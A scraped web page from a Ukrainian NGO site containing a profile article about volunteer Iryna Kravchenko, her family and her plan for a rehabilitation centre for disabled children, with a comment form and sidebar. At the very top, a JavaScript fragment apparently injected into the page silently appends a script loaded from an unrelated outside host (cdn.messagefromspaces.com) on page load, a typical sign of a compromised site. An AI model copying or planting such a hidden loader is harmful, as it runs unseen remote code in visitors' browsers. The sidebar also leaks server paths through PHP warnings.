, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

ІРИНА КРАВЧЕНКО: «ЛЮБОВ ВРЯТУЄ СВІТ!»

 

ІРИНА КРАВЧЕНКО: «ЛЮБОВ ВРЯТУЄ СВІТ!»

Усе наше життя складається з життєвих історій. І не варто говорити, що «живу, як усі».

 – Долі людські неповторні, – стверджує щоразу, коли рекомендує мені чергового героя, Світлана Винограденко, голова правління МГО «МОЗІРОН». – Вона обов’язково наголошує про якусь неймовірну особливість людини.

Про Ірину Кравченко Світлана Винограденко сказала легко й коротко: «Іра наш волонтер. А ще – нас поріднив спорт. Просто люблю її». Обидві народилися в селищі Білий Колодязь. Нині Ірина Кравченко живе у Вовчанську, що на Харківщині.

З Іриною говорити легко й цікаво. Вона не лише розповідає про себе, сім’ю, а й цікавиться долею співрозмовника. Ірина від початку нашої розмови просить акцентувати увагу на проблеми й труднощі, які виникають у молодих сім’ях. Особливо, коли народжуються дітки з особливими потребами. Ось тут потрібна неабияка допомога й підтримка. Бо, виходить, у цьому немає проблем, то лише ми панікуємо й створюємо їх.

Іра пригадує як зі Світланою їздили на збори, коли займалися лижним спортом.

– О! То були незабутні часи, – усміхається Іра й розповідає як вони розважалися й розмальовували хлопців зубною пастою! Раділи найменшим перемогам. Та й зараз любимо однаково життя.

Без спорту Ірина не уявляє свого життя. Зараз займається скандинавською ходьбою: двічі на тиждень – середа й субота – все за розкладом!

На дозвіллі любить підспівувати любому чоловікові. Він прекрасно грає на гітарі, а ще – чудовий байкер! Самі тримаються на позитиві й людей захоплюють і надихають. Ірина любить вчитися й навчати інших. Завжди прагне відкривати щось нове. Наприклад, робота в мережі «ОРІФЛЕЙМ» для неї це не просто заохотити людей й продати продукцію, а переконатися й пересвідчитися в ефективності продукції, результаті.

Як і кожна жінка, Ірина не просто мріє бути красивою, а йде до того постійно. Наприклад, свого часу закінчила курси перукарського мистецтва.

Доля так склалася, що в Ірини старша донечка потребує постійної уваги й підтримки. В родині до цього ставляться з розумінням. Та це прийшло не одразу. Скільки треба було пережити й подолати труднощів… Тому Іра одразу ж підтримала чудовий проект Світлани Винограденко «За здоров’я і довголіття». Вона має прекрасне бажання – створити Центр для діток-інвалідів. Вже й назву придумала «Аріанда». А скільки вкладено у це слово… «Коли буду старшою, мене називатимуть Ариною…А далі слово вбирає початкові склади імен доньок: Насті й Даринки…» Отож, у Старому Салтові, біля водосховища, планується побудувати кілька літніх будиночків для реабілітації й відпочинку мам з дітками-інвалідами. Звісно, на відпочинок матимуть приїхати всі бажаючі, але для родин з дітками-інвалідами передбачені пільги. Як хочеться, аби мрії здійснювалися, бажання втілювалися в життя.

Ірина – активна, позитивна, натхнення. Вміє захопити своїми ідеями й проектами будь кого. Вміє й любить спілкуватися з людьми. З народженням Анастасії у ній оселилася внутрішня сила й мудрість. Її життєве кредо – любити життя, дати можливість і надію проявити себе кожній дитині з особливими потребами, реалізувати себе у цьому світі.

Ірина Кравченко впевнена: «Любов врятує світ!»

Людмила ЧЕЧЕЛЬ

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2